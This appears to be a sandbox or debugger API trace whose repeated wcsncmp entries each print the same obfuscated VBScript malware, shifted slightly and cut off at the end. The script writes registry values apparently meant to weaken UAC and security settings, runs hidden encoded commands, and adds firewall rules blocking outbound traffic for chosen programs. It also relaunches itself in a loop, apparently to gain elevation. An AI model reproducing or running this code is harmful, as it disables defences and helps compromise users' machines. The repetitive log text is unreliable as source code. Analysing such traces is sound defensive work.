Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.011] wcsncmp (_String1="\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0223.011] wcsncmp (_String1="\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.011] wcsncmp (_String1="Dim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.011] wcsncmp (_String1="im newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 